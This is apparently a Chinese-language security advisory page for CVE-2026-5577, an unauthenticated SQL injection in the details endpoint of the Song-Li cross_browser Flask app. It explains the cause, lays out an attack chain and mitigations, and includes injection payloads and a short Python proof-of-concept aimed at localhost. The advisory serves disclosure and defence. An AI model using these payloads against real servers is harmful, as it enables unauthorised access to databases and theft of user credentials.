CVE-2026-5577 CVSS 7.3 高危

CVE-2026-5577 cross_browser SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5577

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Song-Li cross_browser

漏洞概述

Song-Li cross_browser 项目的 flask/uniquemachine_app.py 文件中存在 SQL 注入漏洞。攻击者可利用 details 端点的 ID 参数执行恶意 SQL 语句。由于该漏洞无需认证且可远程利用，攻击者可能导致信息泄露、数据篡改或服务中断。目前厂商尚未对此漏洞做出响应。

技术细节

该漏洞的根源在于应用程序未能正确过滤用户输入。在 `flask/uniquemachine_app.py` 的 details 端点处理逻辑中，开发者直接将用户可控的 `ID` 参数拼接到 SQL 查询语句中，而没有使用参数化查询或 ORM 框架提供的防注入机制。这使得攻击者可以通过注入 SQL 控制字符（如 `'` 或 `--`）来改变查询结构。例如，通过构造 `1' OR '1'='1` 类型的 Payload，攻击者可以绕过条件限制或执行联合查询以提取敏感数据。鉴于 CVSS 评分为 7.3，该漏洞具有较高的风险，且利用代码已公开。

攻击链分析

STEP 1

侦察阶段

攻击者识别出目标正在使用 Song-Li cross_browser 应用，并确定 details 端点接受 ID 参数。

STEP 2

漏洞利用

攻击者构造包含恶意 SQL 语句的 HTTP 请求，将 `ID` 参数设置为如 `1' UNION SELECT...` 的 Payload，并发送给服务器。

STEP 3

执行注入

服务器后端将未经过滤的 ID 参数拼接到 SQL 查询中并执行数据库查询，导致攻击者的恶意代码被执行。

STEP 4

达成目标

攻击者根据注入的语句获取数据库敏感信息（如用户凭证）、修改数据或破坏数据库完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def verify_sqli(url):
    # The vulnerable endpoint is 'details' with parameter 'ID'
    target = f"{url.rstrip('/')}/details"
    
    # Payload to test for time-based or error-based SQL injection
    # Example payload trying to extract database version
    payload = "1' UNION SELECT NULL, version(), NULL-- -"
    
    params = {
        "ID": payload
    }
    
    try:
        response = requests.get(target, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {target}")
            print(f"[+] Payload: {payload}")
            print(f"[+] Response length: {len(response.text)} (Check content manually for DB version)")
        else:
            print("[-] Exploit failed or endpoint changed")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target_url = "http://localhost:5000"
    verify_sqli(target_url)

影响范围

Song-Li cross_browser <= commit ca690f0fe6954fd9bcda36d071b68ed8682a786a

防御指南

临时缓解措施

由于厂商尚未发布正式修复版本，建议在 Web 应用防火墙（WAF）中添加针对该端点的 SQL 注入防护规则。同时，建议在互联网边界限制对 `/details` 接口的访问权限，仅允许内部或受信任的 IP 调用，以降低被攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5577
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5577
3 Details https://www.cvedetails.com/cve/CVE-2026-5577/
4 VulDB https://vuldb.com/cve/CVE-2026-5577
5 Link https://github.com/wing3e/public_exp/issues/24
6 Link https://vuldb.com/submit/783502
7 Link https://vuldb.com/vuln/355347
8 Link https://vuldb.com/vuln/355347/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表